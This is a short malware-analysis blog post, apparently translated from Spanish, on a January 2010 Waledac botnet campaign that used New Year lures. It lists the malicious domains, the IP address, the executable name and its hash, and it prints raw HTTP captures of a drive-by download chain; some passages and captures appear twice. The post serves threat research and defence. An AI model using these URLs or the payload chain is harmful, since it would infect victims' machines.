Waledac returns with another attack strategy
After a long period of inactivity, the botnet consisting waledac again deploy a strategy of infection using the pattern that characterizes it: Social Engineering, that this time advantage as cover the beginning of the new year.
Latest waledac campaigns dating from the middle of the year when propagation strategy used pretended to be a video on Independence Day in the U.S., hosted on YouTube. In fact, the most important activity this year came during the first quarter.
Here we see catches describe waledac timeline about their business during 2009.
Here we see catches describe waledac timeline about their business during 2009.
However, those who are behind waledac never stopped and have recently used the domain registration date throughout the period of supposed inactivity.
Each page used for the propagation has a script obfuscated with instructions to be executed automatically on the victim machine. Thus, it exploits a weakness and automatically download and execute malware, turning your computer into a node of the botnet to continue with their activities. We then see a screenshot of the script.
Inside the script is the reference to the counter.php file hosting another script and from which it jumps to http://diokxbgrqkgg.com/ld/trest1/ and this http://diokxbgrqkgg.com/nte/trest1. py, where there is another malicious script.
GET /counter.php HTTP/1.1
Host: aju.nonprobs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://aju.nonprobs.com/2010.html
In this instance, download and run a file called "ny_foroplay.exe" (MD5: df2d6f835ad6e5276b1b1ffe73170070) from IP address 95.169.190.208 hosted in Russia.
It's worth noting that this malware has a very low rate of detection, being detected to date antivirus companies only 6 out of 40. Report VT.
It's worth noting that this malware has a very low rate of detection, being detected to date antivirus companies only 6 out of 40. Report VT.
GET /pr/pic/ny_foroplay.exe HTTP/1.0
Host: 95.169.190.208
HTTP/1.0 200 OK
Age: 1542
Date: Fri, 01 Jan 2010 19:22:58 GMT
Content-Length: 416256
Content-Type: application/octet-stream
Server: nginx/0.8.15
Last-Modified: Fri, 01 Jan 2010 19:22:58 GMT
MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$.........y.=u..=u..=u...u..u..
Host: 95.169.190.208
HTTP/1.0 200 OK
Age: 1542
Date: Fri, 01 Jan 2010 19:22:58 GMT
Content-Length: 416256
Content-Type: application/octet-stream
Server: nginx/0.8.15
Last-Modified: Fri, 01 Jan 2010 19:22:58 GMT
MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$.........y.=u..=u..=u...u..
Related information
Waledac/Storm. Past and present a threat
Estrategia BlackHat SEO propuesta por Waledac
Waledac. Seguimiento detallado de una amenaza latente
More Waledac in action. Can you guess how much you master win?
Waledac more loving than ever
Social Engineering and Waledac Valentine
0 comentarios:
Post a Comment